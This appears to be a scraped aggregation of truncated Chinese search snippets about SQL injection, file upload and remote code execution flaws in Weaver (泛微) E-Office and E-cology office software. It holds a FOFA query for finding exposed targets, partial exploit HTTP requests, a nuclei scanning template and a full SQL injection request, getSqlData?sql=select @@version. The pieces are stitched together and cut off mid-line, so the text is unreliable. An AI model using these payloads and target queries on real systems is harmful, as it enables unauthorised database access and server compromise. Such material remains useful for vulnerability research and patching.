弱口令检测、 漏洞扫描、端口扫描(协议识别,组件识别)、web目录扫描、等保模拟定级、自动化运维、等保工具(网络安全等级保护现场测评工具)内置3级等保核查命令、基线核查工具 - 增加识别泛微-EOffice-SQL注入漏洞 · free-ongkir/Golin@3de2da1
漏洞简介 泛微E-Office 协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改; 漏洞复现 fofa语法:app="泛微-EOffice" 登录页面如下: POC: POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1...
nuclei批量yaml文件 id:fanwei_eoffice_json_common_sqliinfo:name:泛微E-Officejson_common.php文件存在sql注入漏洞author:mhb17severity:criticaldescription:descriptionreference:-https://tags:sqlirequests:-raw:-|+ POST /building/json_common.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windo...
近日,微步在线获取到泛微 E-office SQL注入漏洞和文件包含漏洞相关漏洞情报,攻击者可利用 SQL 漏洞获取...
泛微e-office10是一款专业的协同OA软件,支持全终端,移动功能显著,包括知识文档管理、流程管理、项目管理、客户管理、费用管理、协作区、任务管理等功能模块。 泛微e-office10 在 10.0_20230821 版本之前存在远程代码执行漏洞。未经授权的攻击者可以构造特制的请求包进行利用,从而进行任意代码执行,控制服务器。
泛微HrmCareerApplyPerView sql注入漏洞.md 泛微-EMobile存在弱口令漏洞.md 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md 泛微E-...
漏洞复现: 代码语言:javascript 复制 POSThttp://ip:port/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=HTTP/1.1Host:ip:port User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/86.0.4240.111Safari/537.36Accept-Encoding:gzip,deflateAcce...
20.电子签章平台代码执行漏洞 21泛微oa进后台漏洞 22.ucloud的未授权获取任意用户cookie 23.飞书客户端RCE漏洞 24.泛微EofficeV10前台RCE 25.来客推商城任意文件上传 26天明堡垒机Oday 27明御运维审计与风险控制系统堡垒机任意用户注册28协同管理系统存在SQL注入29泛微emobile注入漏洞 30.拓尔思WCM任意命令执行漏洞 31....
近日,SINE安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此E-cology的用户,以及数据库oracle都会受到该漏洞的攻击,经过安全技术的POC安全测试,发现漏洞的利用非常简单,危害较大,可以获取管...
e-Weaver SQL注入 GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1 e-cology前台接口SQL注入漏洞 POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333HTTP/1.1 formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%...